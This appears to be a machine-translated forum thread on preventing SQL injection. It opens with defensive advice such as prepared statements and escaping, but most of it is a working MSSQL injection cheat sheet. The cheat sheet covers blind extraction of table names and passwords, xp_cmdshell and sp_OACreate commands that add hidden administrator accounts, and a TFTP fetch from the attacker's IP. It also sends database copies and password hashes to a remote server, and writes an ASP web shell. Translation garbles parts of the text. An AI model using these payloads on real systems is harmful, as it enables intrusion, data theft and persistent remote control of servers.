Summary of preventing SQL statement injection attacks

-----Solution--------------------------------------------------------
Filter some special characters in the URL, the dynamic SQL statement uses preparestatement ...
------Solution--------------------------------------------------------
The way to inject is to add a SQL string to the query criteria. You can check to see if SQL is included in the query parameters submitted, but this is usually not helpful.

The best way is not to use the concatenation of SQL strings, you can use Preparestatement, parameters with the Set method to fill
------Solution--------------------------------------------------------
SQL injection form: ... where name= "+name+", such SQL statements are easy to inject SQL, you can do this:
Jdbctemplate.update ("Delete from userinfo where id=?") And userid=? ", New Object[]{userinfo.getid (), Userinfo.getuserid ()});
Some of my code, look useful!
------Solution--------------------------------------------------------
SQL Injection Vulnerability attack: 1 ' or ' 1 ' = ' 1
Using parameterized queries to avoid
cmd.commandtext= "SELECT COUNT (*) from table name where username=@a and Password=@b";
CMD.PARAMETERS.ADD (New SqlParameter ("A", "..."));
CMD.PARAMETERS.ADD (New SqlParameter ("B", "..."));
------Solution--------------------------------------------------------
Well, with the framework, with the JPA Pojo. There's no such thing.

How do you prevent SQL injection in the SSH2 architecture? How do you design other related safety issues?
Current security, just encrypt the user password, front jquery verification.
How to prevent injection attacks and my page some hidden fields save information such as the current logged-on user.
Users view the page source code can be viewed.
Are there any good solutions? What other places to pay attention to?
STRUTS2 hibernate3 Spring 3.0
SQL Server SP4

------Solution--------------------------------------------------------
1: Purchase a certificate from the CA and use HTTPS for communication to ensure that the network is secure during transmission
2: Avoid XSS injection (page echo input text, input hidden are filtered <, >, "," and so on)
3: Use a random keyboard or security control to prevent the keyboard Trojan record user input
4: To write data in a cookie, use the HttpOnly property of the cookie as much as possible
5: In the response, set up some HTTP headers, such as X-frame-options, X-xss-protection, and other high browser support
6: Regardless of whether the client has done data validation, the server must have data validation (length, format, whether required to fill, etc.)
The 7:sql statement uses the PreparedStatement fill parameter way, is forbidden to use the string concatenation SQL or the HQL statement

And share some more ways

1. Force character format (type)

In many cases we want to use a similar URL like xxx.php?id=xxx, in general $id are integral variables, in order to prevent the attacker to tamper with the $id to attack statements, as far as possible to coerce variables, the code is as follows:

PHP anti-SQL injection code:

$id = Intval ($_get[' id '));

Of course, there are other variable types, and if necessary, try to force the format.

2. Include variable quotes in SQL statements

It's simple, but it's easy to get involved, so let's take a look at these two SQL statements:

SQL code:

SELECT * FROM article WHERE ArticleID = ' $id '

SELECT * FROM article WHERE ArticleID = $id

Both types of writing are common in a variety of programs, but security is different, the first sentence because the variable $id placed in a pair of single quotes, so that we have submitted variables into a string, even if the correct SQL statements, and will not execute normally, and the second sentence is different, because the variable is not placed in single quotes, All we have to submit, as long as there is a space, that the space after the variable will be executed as an SQL statement, so we have to make the SQL statements in the habit of quoting variables.

3. URL pseudo-Static

URL pseudo-static is also URL rewrite technology, like discuz! The same, all URLs are rewrite into a similar xxx-xxx-x.html format, which is conducive to SEO, but also to achieve a certain degree of security, but also a good way. But want to implement PHP to prevent SQL injection, if you have to have a certain "regular" basis.

4. Filter and escape with PHP function

One of the more important aspects of PHP's SQL injection is the setup of GPC because the version below MYSQL4 does not support the Sub statement, and when the MAGIC_QUOTES_GPC in PHP.ini is on, all the "'" (single quotes), "" "(double quotes)," "(backslashes) and null characters are automatically converted to escape characters that contain backslashes, which can be a hindrance to SQL injection.

5. Use PHP to filter and escape MySQL functions

PHP's MySQL operation functions include addslashes (), mysql_real_escape_string (), mysql_escape_string (), and so on, to escape special characters or characters that may cause errors in database operations.

So what's the difference between these three functional functions? Let's go into the details below:

The problem with ①addslashes is that hackers can use 0xbf27 instead of single quotes, and addslashes simply modifies 0xbf27 to 0xbf5c27, which is called a valid multi-byte character, where 0xbf5c is still considered single quotes, So addslashes cannot successfully intercept.

Of course, addslashes is also not useless, it is used for single-byte string processing, multibyte characters or use mysql_real_escape_string bar.

Also for examples of GET_MAGIC_QUOTES_GPC in the PHP manual:

if (!GET_MAGIC_QUOTES_GPC ()) {

$lastname = addslashes ($_post[' LastName '));

}else{

$lastname = $_post[' LastName '];

}

Analysis of common SQL injection statements

It is best to check the $_post[' LastName ' If the MAGIC_QUOTES_GPC has been opened.

Again, the difference between the 2 functions of mysql_real_escape_string and mysql_escape_string:

Mysql_real_escape_string must be available in the case of (PHP 4 >= 4.3.0, PHP 5). Otherwise you can only use mysql_escape_string.

Mysql_real_escape_string takes into account the current character set of the connection, and Mysql_escape_string does not consider it.

Discuz to prevent SQL injection is to use the Addslashes function:

function Daddslashes ($string, $force = 0, $strip = FALSE) {

if (! MAGIC_QUOTES_GPC | | $force) {

if (Is_array ($string)) {

foreach ($string as $key => $val) {

$string [$key] = Daddslashes ($val, $force, $strip);

}

} else {

$string = Addslashes ($strip stripslashes ($string): $string);

}

}

return $string;

}

Common SQL injection methods

Common SQL injection Statements

1. Determine whether there is a point of injection

; and 1=1 and 1=2

2. Guess table General table name is no more than admin Adminuser user pass password and so on.

and 0<> (SELECT COUNT (*) from *)

and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists

3. Guess the number of accounts if encountered 0< return to the correct page 1<; return error page to explain the number of accounts is a

and 0< (SELECT COUNT (*) from admin)

and 1< (SELECT COUNT (*) from admin)

4. Guess the field name is added to the Len () bracket with the field name we think of.

and 1= (SELECT COUNT (*) from admin where Len (*) >0)--

and 1= (SELECT COUNT (*) from admin where Len (user field name) >0)

and 1= (SELECT COUNT (*) from admin where Len (password field name password) >0)

5. Guess the length of each field guess solution length is to transform >0 until the correct page is returned

and 1= (SELECT COUNT (*) from admin where Len (*) >0)

and 1= (SELECT COUNT (*) from admin where Len (name) >6) error

and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6

and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct

and 1= (SELECT COUNT (*) from admin where Len (password) >11) is correct

and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length 12

and 1= (SELECT COUNT (*) from admin where Len (password) =12) is correct

6. Guess the character

and 1= (SELECT COUNT (*) from admin where left (name,1) =a)---Guess the first digit of the user account

and 1= (SELECT COUNT (*) from admin where left (name,2) =ab)---Guess the second digit of the user account

Just one character at a time. Guess how many you just guessed. The account number is out.

and 1= (select top 1 count (*) from Admin where ASC (mid pass,5,1) =51)--

This query can be used to guess the Chinese user and password. Just change the number in the back to Chinese assic code is OK. Finally, the result is converted to a character.

Group by users. ID having 1=1--

Group by users. Id,users.username,users.password,users.privs having 1=1--

; Insert into users values (666,ATTACKER,FOOBAR,0XFFFF)--

UNION SELECT top 1 column_name from INFORMATION_SCHEMA. COLUMNS WHERE table_name=logintable-

UNION SELECT top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name=logintable where column_name not in

(login_id)-

UNION SELECT top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name=logintable where column_name not in

(Login_id,login_name)-

UNION SELECT top 1 login_name from logintable-

UNION SELECT top 1 password from logintable where login_name=rahul--

See the server to play the patch = Error SP4 patch

and 1= (SELECT @ @VERSION)--

Look at the database connection account permissions, back to normal, proof is the server role sysadmin permissions.

and 1= (SELECT is_srvrolemember (sysadmin))--

Determine the connection database account number. (with SA account connection back to normal = Confirm the Connection account is SA)

and sa= (SELECT system_user)--

and user_name () =dbo--

and 0<> (select USER_NAME ()--

See if xp_cmdshell deleted

and 1= (SELECT count (*) from master.dbo.sysobjects WHERE xtype = X and name = xp_cmdshell)--

xp_cmdshell is deleted, restored, and supports absolute path recovery

; EXEC Master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--

; EXEC Master.dbo.sp_addextendedproc xp_cmdshell,c:inetpubwwwrootxplog70.dll--

Reverse Ping your own experiment

; use Master;declare @s int;exec sp_oacreate "Wscript.Shell", @s out;exec sp_OAMethod @s, "Run", NULL, "cmd.exe/c Ping 192.16 8.0.1 ";--

Add account number

;D eclare @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_OAMethod @shell, run,null,c: WINNTsystem32cmd.exe

/C NET user jiaoniang$ 1866574/add--

Create a virtual directory E disk:

;d eclare @o int exec sp_oacreate wscript.shell,@o out exec sp_OAMethod @o,run,null,cscript.exec: Inetpubwwwrootmkwebdir.vbs-w "Default Web Site"-V "E", "E:"-

Access properties: (with writing a webshell)

DECLARE @o int exec sp_oacreate wscript.shell,@o out exec sp_OAMethod @o,run,null,cscript.exe c: Inetpubwwwrootchaccess.vbs-a w3svc/1/root/e +browse

Special tips for%5c=:: To submit/and modify%5

and 0<> (select top 1 paths from newtable)--

Get the library name (from 1 to 5 are system id,6 above can be judged)

and 1= (select name from master.dbo.sysdatabases where dbid=7)--

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)

Submit dbid = 7,8,9 in turn .... Get more database names

and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) bursts into a table that is assumed to be admin

and 0<> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name not in (Admin)) to get the other tables.

and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin

and uid> (str (ID)) The number of bursts to the UID is assumed to be 18779569 Uid=id

and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field from admin, assuming user_id

and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name does not

(ID,...)) To storm out the other fields.

and 0< (select user_id from BBS.dbo.admin where username>1) can get user name

You can get the password in turn. Suppose there are fields such as user_id Username,password

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)

and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) gets the table name

and 0<> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name isn't in (address))

and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin and uid> (str (ID)) Determine the ID value

and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields

Id=-1 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

Id=-1 Union Select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access)

Get the Web Path

; CREATE TABLE [dbo]. [Swap] ([Swappass][char] (255));--

and (select top 1 swappass from swap) =1--

; CREATE TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master. Xp_regread

@rootkey =hkey_local_machine, @key =systemcurrentcontrolsetservicesw3svcparametersvirtual Roots, @value_name =/,

values= @testOUTPUT INSERT into paths (path) values (@test)--

; Use ku1;--

; CREATE table cmd (str image);--Create table cmd of image type

There is a xp_cmdshell test process:

; exec master.. xp_cmdshell dir

; exec master.dbo.sp_addlogin jiaoniang$;--plus SQL account

; exec Master.dbo.sp_password null,jiaoniang$,1866574;--

; exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

; Exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574/workstations:*/times:all/passwordchg:yes/passwordreq:yes

/active:yes/add;--

; exec master.dbo.xp_cmdshell net localgroup Administrators jiaoniang$/add;--

EXEC master.. Xp_servicecontrol start,schedule Start Service

EXEC master.. Xp_servicecontrol Start,server

; DECLARE @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_OAMethod @shell, run,null,c:winntsystem32

cmd.exe/c NET user jiaoniang$ 1866574/add

;D eclare @shell INT exec sp_oacreate Wscript.Shell, @shell OUTPUT exec sp_OAMethod @shell, Run,null, C:winntsystem32cmd.exe

/C net localgroup administrators jiaoniang$/add

; EXEC master.. xp_cmdshell tftp-i Youip Get file.exe--use TFTP to upload files

;d eclare @a sysname set @a=xp_+cmdshell exec @a dir c:

;d eclare @a sysname set @a=xp+_cm ' + ' Dshell exec @a dir c:

;d eclare @a;set @a=db_name (); Backup database @a to disk= your IP your shared directory Bak.dat

If you are limited, you can.

SELECT * FROM OPENROWSET (Sqloledb,server;sa;,select ok! exec master.dbo.sp_addlogin Hax)

Query construction:

SELECT * FROM news WHERE id= ... and topic= ... And .....

Adminand 1= (SELECT COUNT (*) from [user] where Username=victim and right (left (userpass,01), 1) =1) and Userpass <>

Select 123;--

; Use master;--

: A or name like fff%;--shows a user named FFFF.

and 1<> (select count (email) from [user]);--

; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and status>0) where name=ffff;--

; Update [users] set email= (select top 1 id from sysobjects where xtype=u and Name=ad) where name=ffff;--

; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and id>581577110) where name=ffff;--

; Update [users] set email= (select top 1 count (IDs) from password) where name=ffff;--

; Update [users] set email= (select top 1 pwd from password where id=2) where name=ffff;--

; Update [users] set email= (select top 1 name from password where id=2) where name=ffff;--

The above statement is to get the first user table in the database and place the table name in the FFFF user's mailbox field.

By looking at FFFF's user profile, you can get the first one to use the table called AD

And then get the ID of the table based on the table name ad to get the name of the second table.

Insert into users values (666,char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), char (0x63) +char (0x68) +char ( 0x72) +char

(0x69) +char (0x73), 0xFFFF)--

Insert into users values (667,123,123,0XFFFF)--

Insert into users values (123,admin--, password,0xffff)--

; and user>0

; and (select COUNT (*) from sysobjects) >0

; and (select COUNT (*) from mysysobjects) >0//is an Access database

Name of the data table

Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0);--

This is where the first table name is updated to the AAA field.

read out the first table, and the second table can be read like this (after the condition plus the name of the table that name<>; just obtained).

Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0 and Name<>vote);--

Then id=1552 and exists (SELECT * from AAA where aaa>5)

read out the second table, read it all, until it's not.

Read the field like this:

Update AAA Set aaa= (select top 1 col_name (object_id (table name), 1));--

Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name

Update AAA Set aaa= (select top 1 col_name (object_id (table name), 2));--

Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name

[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]

Update table name Set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<>; the table name you obtained to find one plus one])

[Where Condition] Select top 1 name from sysobjects where Xtype=u and status>0 and name not in (Table1,table2, ...). ）

Build database administrator account and system administrator account through SQL Server Injection vulnerability [current account must be sysadmin group]

[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]

Update table name Set field = (select top 1 col_name (object_id (data table name to query), field column as: 1) [Where condition]

Bypass IDs detection [using variables]

;d eclare @a sysname set @a=xp_+cmdshell exec @a dir c:

;d eclare @a sysname set @a=xp+_cm ' + ' Dshell exec @a dir c:

Open a remote database

Basic syntax

SELECT * FROM OPENROWSET (Sqloledb,server=servername;uid=sa;pwd=123,select * from table1)

Parameters: (1) OLE DB Provider name

Where the connection string parameter can be any port used to connect, such as

SELECT * from OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table

Copy all remote tables to the local table for the entire database of the target host.

Basic syntax:

Insert INTO OPENROWSET (Sqloledb,server=servername;uid=sa;pwd=123,select * to table1) SELECT * FROM Table2

This line of statements copies all the data from the Table2 table on the target host to the Table1 table in the remote database. In practice, the IP address and port of the connection string are appropriately modified to point to where needed, such as:

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * FROM

Table2

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysdatabases)

SELECT * FROM master.dbo.sysdatabases

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysobjects)

SELECT * FROM User_database.dbo.sysobjects

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _syscolumns)

SELECT * FROM User_database.dbo.syscolumns

To copy a database:

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * from database. Table1 INSERT into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table2) SELECT * Fromdatabase ... Table2

The hash of the copy Hassi (hash) login password is stored in the sysxlogins. The method is as follows:

Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _sysxlogins) Select

* FROM Database.dbo.sysxlogins

After the hash is obtained, it can be violently cracked.

Ways to traverse a directory: Create a temporary table first: Temp

CREATE table temp (ID nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--

; Insert temp exec master.dbo.xp_availablemedia;--get all current drives

; INSERT into temp (ID) EXEC master.dbo.xp_subdirs c:;--get a subdirectory list

; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_dirtree c:;--Get the directory tree structure of all subdirectories and inch into the temp table

; INSERT into temp (ID) EXEC Master.dbo.xp_cmdshell type c:webindex.asp;--View the contents of a file

; INSERT into temp (ID) exec Master.dbo.xp_cmdshell dir c:;--

; INSERT into temp (ID) exec Master.dbo.xp_cmdshell dir c: *.asp/s/a;--

; INSERT into temp (ID) EXEC Master.dbo.xp_cmdshell cscript. C:inetpubadminscriptsadsutil.vbs enum W3SVC

; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_dirtree c:;--(xp_dirtree applicable permissions public)

Write to table:

Statement 1:and 1= (SELECT is_srvrolemember (sysadmin));--

Statement 2:and 1= (SELECT is_srvrolemember (serveradmin));--

Statement 3:and 1= (SELECT is_srvrolemember (setupadmin));--

Statement 4:and 1= (SELECT is_srvrolemember (securityadmin));--

Statement 5:and 1= (SELECT is_srvrolemember (securityadmin));--

Statement 6:and 1= (SELECT is_srvrolemember (diskadmin));--

Statement 7:and 1= (SELECT is_srvrolemember (bulkadmin));--

Statement 8:and 1= (SELECT is_srvrolemember (bulkadmin));--

Statement 9:and 1= (SELECT is_member (db_owner));--

Write the path to the table:

; Create table dirs (paths varchar (), ID int)--

; Insert dirs exec master.dbo.xp_dirtree c:--

and 0<> (select top 1 paths from dirs)--

and 0<> (select top 1 paths to dirs where paths not in (@Inetpub))--

; Create table dirs1 (paths varchar (), ID int)--

; Insert dirs exec master.dbo.xp_dirtree e:web--

and 0<> (select top 1 paths from dirs1)--

Back up the database to the Web directory: Download

;d eclare @a sysname; Set @a=db_name (); Backup Database @a to disk=e:webdown.bak;--

and 1= (select top 1 name from (select top Id,name to sysobjects where Xtype=char) T ORDER BY id DESC)

and 1= (Select top 1 col_name (object_id (User_login), 1) from sysobjects) refer to the related table.

and 1= (select user_id from User_login)

and 0= (select User from User_login where user>1)

-=-Wscript.Shell Example-=-

DECLARE @o int

EXEC sp_OACreate Wscript.shell,@o out

EXEC sp_OAMethod @o,run,null,notepad.exe

; DECLARE @o int exec sp_oacreate wscript.shell,@o out exec sp_OAMethod @o,run,null,notepad.exe--

DECLARE @o int,@f int,@t int, @ret int

DECLARE @line varchar (8000)

EXEC sp_OACreate Scripting.filesystemobject,@o out

EXEC sp_OAMethod @o,opentextfile,@f out,c:boot.ini,1

exec @ret = sp_OAMethod @f,readline, @line out

while (@ret = 0)

Begin

Print @line

exec @ret = sp_OAMethod @f,readline, @line out

End

DECLARE @o int,@f int,@t int, @ret int

EXEC sp_OACreate Scripting.filesystemobject,@o out

EXEC sp_OAMethod @o,createtextfile,@f out,c:inetpubwwwrootfoo.asp,1

exec @ret = sp_OAMethod @f,writeline,null,

<% Set o = Server.CreateObject ("Wscript.Shell"): O.run (Request.QueryString ("cmd"))%>

declare @o int, @ret int

EXEC sp_OACreate Speech.voicetext,@o out

EXEC sp_OAMethod @o,register,null,foo,bar

EXEC sp_OASetProperty @o,speed,150

EXEC sp_OAMethod @o,speak,null,all Your sequel servers are belong to,us,528 WAITFOR delay 00:00:05

; declare @o int, @ret int exec sp_oacreate speech.voicetext,@o out exec sp_OAMethod @o,register,null,foo,bar exec

sp_OASetProperty @o,speed,150 exec sp_OAMethod @o,speak,null,all Your sequel servers are belong to us,528 waitfor delay 00 : 00:05--

Xp_dirtree Applicable Permissions Public

EXEC master.dbo.xp_dirtree C:

The information returned has two fields subdirectory, depth. The subdirectory field is a character type and the depth field is an shaping field.

CREATE TABLE dirs (paths varchar (), id int)

The table built here is related to the above Xp_dirtree, the fields are equal, the types are the same.

Insert dirs exec master.dbo.xp_dirtree c:

As long as we create tables that are defined equal to the fields returned by the stored process, they can be executed! Achieve the effect of writing a table.